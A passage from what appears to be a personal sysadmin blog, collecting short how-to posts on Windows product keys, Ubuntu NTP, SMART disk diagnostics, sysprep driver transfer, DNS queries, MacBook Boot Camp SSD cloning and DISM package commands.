• -click ACPI (at the top).
• -click MSDM tab (towards the top)
• -look at the last line, it is the embedded PRODUCT KEY ;-)

There are other ways to do this such as:

• -open COMMAND PROMPT.
• -type: WMIC Path SoftwareLicensingService Get OA3xOriginalProductKey

As well as other ways.

NOTES:

Wrong Time on Ubuntu - NTP

SCENARIO

Fresh install of Ubuntu. Wrong time. Day later, still wrong time.

HOW TO FIX THE WRONG TIME ON UBUNTU

• -edit /etc/ntp.conf
• -comment out the "pool" servers.
• -comment out the fallback "pool" server.
• -type: server 192.168.1.1 (or local server/router/switch that can provide NTP services)
• -save
• -stop service: /etc/init.d/ntp stop
• -start service: /etc/init.d/ntp start

This may happen for various reasons. For me, the high-end firewall was blocking outside NTP servers from talking on port 123.

NOTES: do not use/install ntpdate package, it is depreciated.

Digital Watchdog Spectrum Client on Ubuntu 16.0.4 LTS

Getting Digital Watchdog Spectrum Client on Ubuntu 16.0.4 LTS can be not-so-straight-forward especially if you are not from the Linux world.

TO INSTALL:

• open TERMINAL
• type: sudo dkpg -i digitalwatchdog-client-2.4.1.10278-x64-release.deb
• (NOTE: do not just double-click on the file. Do not install with UBUNTU SOFTWARE MANAGER).
• go through the setup process.

On UBUNTU 14.02, you are finished. On UBUNTU 16.0.4, you need the following:

• type: sudo apt-get install libgstreamer-plugins-base0.10-dev

That's it! You should now be able to use the Digital Watchdog Spectrum client.

Testing HD with Smartctl & Finding the Filesystem

Hmmm. Something is wrong with SDA. Let's test it:

1.smartctl -t short /dev/sda

And look at the results:

1.smartctl -a /dev/sda

The last 5 result log shows:
Error: UNC 8 sectors at LBA = 0x00384622 = 3687970

SMART Self-test log structure revision number 1
Num Test_Description Status Remaining LifeTime(hours) LBA_of_first_error
# 1 Short offline Completed: read failure 10% 44084 976766499

So we have to find the filesystem. Usually it would be:

1.# fdisk -lu /dev/sda

I get:

1.Disk /dev/sda: 500.1 GB, 500107862016 bytes
2.255 heads, 63 sectors/track, 60801 cylinders, total 976773168 sectors
3.Units = sectors of 1 * 512 = 512 bytes
4.Device Boot Start End Blocks Id System
5./dev/sda1 * 1 208769 104384+ fd Linux raid autodetect
6.Partition 1 does not end on cylinder boundary.
7./dev/sda2 208770 976768063 488279647 fd Linux raid autodetect

Using:
((976766499- 208770) * 512) / 4096

We get:
122069716 LBA block.

But wait, the filesystem isn't on sda, it's on /dev/main/root. Here's how:

1.# cat /etc/fstab
1./dev/main/root / ext3 usrquota,grpquota 1 1
2./dev/md1 /boot ext3 defaults 1 2
3./dev/main/swap swap swap defaults 0 0

So we know files system is mounted at /dev/main/root and it is ext3 type.

We can find the BLOCK SIZE by:

1.# tune2fs -l /dev/main/root | grep Block

I get:

1.Block count:              121561088
2.Block size:               4096
3.Blocks per group:         32768

We're still at 122069716 LBA block.
Or specifically 122069716.125 or the second of 8 sectors in this block.

We can test the block by:

1.# debugfs
2.debugfs 1.39 (29-May-2006)
3.debugfs:  open /dev/main/root
4.debugfs:  testb 122069716
5.Illegal block number passed to ext2fs_test_block_bitmap #122069716 for block bitmap for /dev/main/root
6.Block 122069716 not in use
7.debugfs:  quit

In short, it looks like this:

==================================================================
sda1  sdb1
|
md1

sdb1 sdb2
|
md2
|
pv (md2)
|
vg (main)
/            \
lv (main/root)        lv (main/swap)

Transfer Hard Drive to New Hardware

Transfer hard drive to new hardware. It can be done.

• -take note of current setup bios for the ATA, AHCI, RAID setup.
• -run c:\windows\system32\sysprep\sysprep.exe
• -click GENERALIZE
• -wait an hour and let it shutdown.
• -tranfer to new hardware.
• -boot pc
• -change bios to match old setup.
• -wait for it to boot

All of your stuff should be intact.

If for some reason that doesn't work, you can always load the drivers in the Windows in an offline manner.

• -find your motherboard model number.
• -extract them to the C drive (for example: c:\drivers\chipset)
• -boot into REPAIR MODE or start with WINDOWS OS INSTALL media (usb, CD, PXE, etc).
• -click REPAIR YOUR COMPUTER (bottom-left).
• -click COMMAND PROMPT.
• -find what letter your WINDOWS-DIRECTORY is.
• -type: dism /image:c:\ /add-driver /Driver:e:\install\chipset\ /recurse
• -hit ENTER
• -type EXIT
• -reboot

DNS Servers

I love DNS servers. I really do. You ask a question, they give an answer. Here are some of the more popular ones.

4.2.2.1
4.2.2.2
4.2.2.3
4.2.2.4
4.2.2.5

8.8.8.8
8.8.4.4

137.65.1.1
137.65.1.2
137.65.1.3

75.75.75.75
75.75.76.76

OPENDNS SERVERS

208.67.222.222
208.67.220.220

You can use OPENDNS as a web content filtering tool to automatically block inappropriate content and keep children safe.

To ask a question you can use DIG (*nix) or NSLOOKUP (Windows). I prefer DIG and install it on Windows rather easily via GNUWIN.

• -open shell of some kind (putty, command, power, etc)
• -type: dig daknetworks.com
• -type: nslookup daknetworks.com

To ask a question of a specific server:

• -type: dig daknetworks.com @4.2.2.2
• -type: nslookup daknetworks.com 4.2.2.2

To ask a specific type of record:

• -type: dig -t mx daknetworks.com
• -type: nslookup set type=mx daknetworks.com

To ask for an authoritative record:

• -type: dig -t ns daknetworks.com
• -type: nslookup -type=soa daknetworks.com

To ask for all the info:

• -type: nslookup -debug daknetworks.com 1.2.3.4

Clone MacBook Pro Hard Drive With Boot Camp

I have a 128GB SSD HD and I want to upgrade to a newly acquired 512GB SSD HD. How do I upgrade my ssd hard drive to a larger ssd hard drive on my MacBook Pro?

ps- I have Boot Camp with a Windows partition.
pss- many posts claim this can't be done or post a really, really long and complicated instruction set. Don't believe them. ;-)

• -clone the drive (clonezilla).
• -resize the Windows Boot Camp partition (gparted).
• -sync the partition tables (gparted).
• -resize the OSX partition (diskutil).
• -fix the Windows bootloader (Windows).

NEEDED
-usb with ubcd with parted magic (UBCD is universal boot cd).
-host system.
-Windows 7/8 cd/usb (or a Windows repair disk).

CLONE
-plug both ssd's into the host system.
-boot via usb.
-start parted-magic.
-start clonezilla
-clone disk to disk
-wait till finished
(this could take awhile)

MOVE/RESIZE WINDOWS PARTITION
-you should still be in parted-magic
-start gparted
-resize windows partition as needed (grab the handles)
-move windows partition to the end
-move the osx recovery boot loader next to the windows partition
-apply changes
-wait
-after it's finished, if needed, you can fix the filesystem for both OSX and WINDOWS.

SYNC FOR BOOT CAMP
-you should still be in parted-magic
-open terminal
-type: sudo gptsync /dev/sda (or other device such as sdb sdc sdd. gparted will show you).
-confirm Y
-shutdown

RESIZE OSX PARTITION
-boot into os x with the new, larger hd.
-open Disk Utility.
-click the disk on the left hand side.
-click the PARITION button (at the top).
-select the volume you want to grow.
-look at the info-window (at the bottom).
-note the Disk Identifier (mine was disk0s2).
-open Terminal.
-type the following command: diskutil resizeVolume /dev/disk0s2 limits
-it will show the current size, minimum size and maximum size.
-note the maximum size (mine was 254.2GB. Do not get the part in parentheses.)
-type the following command: sudo diskutil resizeVolume /dev/disk0s2 254.2GB
(NOTE: the number above requires a GB but no space.)
-wait.
-shutdown

This also works if you get messages like "No boot device found" etc.

This happens when the items get fouled up. How do you know if items are fouled up?
Boot MacBook Pro to Windows either:
-through holding the OPTION key on boot up (after chime).
-boot into OSX and go to SYSTEM-PREFERENCES and choose the START-UP DISK.
-you will see "No boot device" or Windows is going into repair mode on it's own.

In either case, the following will work as a full instruction set. Adjust as needed.

-insert Windows 7/8 cd/usb (or a Windows repair disk).
-boot while holding OPTION key.
-wait for windows 7 cd/usb shows (it could take a minute).
-select Windows 7.
-click NEXT.
-select REPAIR YOUR COMPUTER (bottom left).
-click NO (for automatic repair).
-click NEXT (at bottom right).
-click COMMAND PROMPT.
-type: bootrec /scanos.
(If it isn't already there, it should find the WINDOWS installation and ask if you want to add it.)
-type: Y

-type: Diskpart
-type: LIST DISK
-type: SELECT DISK 0 (change this to the number of the disk . most likely 0)
-type: LIST PARTITION
-type: SELECT PARTITION 4 (change this to your partition number. most likely 4)
-type: DETAIL PARTITION
(it will show the details of the partition. We're trying to find the partition with the windows installation.)
-if you found it, it will probably say ACTIVE: NO
-type: ACTIVE
-type: EXIT

-type: bootrec /fixmbr (needed?)
-type: bootrec /fixboot (needed?)
-type: bootrec /rebuildbcd
-type: exit
-click RESTART

CHECKDISK
-when it restarts it will do a chkdsk.
-let it finish.
-it will reboot.
-voila! You can bootcamp Windows!

For diagnostic information, this is provided.

-boot to osx
-open terminal
-type: diskutil list
-type: sudo gpt -r -vv show disk0
-type: sudo fdisk /dev/disk0

DEFINITIONS
boot manager: manages your booting process. This can actually be changed to REFIND, PLOP, LILO, GRUB2 and a few others. Fun stuff! Not for the faint of heart! (see here for boot loaders https://en.wikipedia.org/wiki/Comparison_of_boot_loaders)
boot loader: load an OS kernel and hand off control of the computer to that kernel.

/--bl-->k-->osx
bm--|--bl-->k-->centos/rhel
\--bl-->k-->win7/8/10

NOTES:

Intel Rapid Storage Technology (RST) (IRST)

I was going to write a blog post about SATA, AHCI, RAID, RST, IRST, ICH10R, X58 and the drivers needed along with the settings and the difference between the drivers and the software but this post does a better job than I ever would be able to (as well as better explanation than Intel does too):

I will say that the SATA/AHCI/RAID/IRST drivers are driving the southbridge (ICH10R, etc) which is the HOST-CONTROLLER (aka DISK-CONTROLLER aka STORAGE-CONTROLLER) and that the CHIPSET drivers are driving the northbridge (X58, etc).

Also, I will say that the speed of the SATA-I (150MB), SATA-II (300MB) or SATA-III (600MB) depends on both the HARD-DRIVE itself and the HOST-CONTROLLER. The easy ways to find the HOST-CONTROLLER speed is by using CPUID or HWINFO.

Lastly, I'll say that you only need the RST if you are running in AHCI or RAID mode. If not, then you can use the chipset drivers.

Quickbooks 2011 on Mac El Capitan

Don't believe QUICKBOOKS support when they tell you that you have to upgrade to the newest version of QUICKBOOKS for MAC. QUICKBOOKS 2011 will work fine.

In the spirit of "just fix it" here's how:

Windows Package Manager

You're familiar with RPM. Windows has a similar package manager. Windows has something similar for Windows packages only.

It should be called WPM for Windows Package Manager but it's called DISM for Deployment Image Servicing and Management.

<tirade>Can they not come up with something all by themselves that works? Must they continuously ripoff open-source projects and change a certain percentage so that they can get around law? Then be so terrible at implementation that it would be graded as a D project?</tirade>

Show all Windows packages:

dism /online /get-packages /Format:Table

Find if a certain package is installed:

dism /online /get-packages |findstr KB2919355

Remove package:

Scan to see if there is corruption:

dism /online /cleanup-image /scanhealth

Report if there is corruption:

dism /online /cleanup-image /checkhealth

Repair if there is corruption:

dism /online /cleanup-image /restorehealth

Restore to a source image:

dism /online /cleanup-image /restorehealth /source:wim:d:\your\source\here\install.wim:1 /limitaccess

Remove old versions of packages:

dism /online /cleanup-image /startcomponentcleanup

Lock in all packages and service-package so that they cannot be uninstalled:

dism /online /cleanup-image /startcomponentcleanup /resetbase

Check to see if you have bad sectors on a disk:

• -use HDTUNE

This will give a graphical representation of any bad sectors on the disk. It will mark it as red.

If you have bad sectors, it isn't the end of the world. We can mark them as bad so that those sectors won't be used any more. If you have 1-9 bad sectors, this isn't a problem. If you have more than 9 then most likely the issue will grow. More bad sectors will show and then the drive will become useless.

Fix bad sectors on a disk:

• -use UBCD > HDD > DIAGNOSTICS > HDAT2
• -type: HDAT2
• -select the disk by using the arrows keys on keyboard.
• -hit ENTER.
• -select VERIFY/WRITE/VERIFY
• -let it run all the way through.

In my experience, if too many bad sectors happen, it's easier to clone the drive and move on with the data loss. At that point, the data might be able to be replaced/repaired.

Cloning can be done with Clonzilla or many other tools. I prefer DDRESCUE as in this article.

Again, there are so manu tools in this area like DATA-LIFEGUARD, SEATOOLS, CRYSTALDISKINFO, etc that it's hard to know what to use and what not to bother with. The above reference of:

• HDTUNE
• HDAT2
• DDRESCUE

is a good start. I wish I retained all the info I've learned and used in the past but most of it escapes me now. No doubt that a data expert will have his or her own choice set of tools. I'd love to hear about them!

Page 1 of 4

• «
•  Start
•  Prev
•  1
•  2
•  3
•  4
•  Next
•  End
• »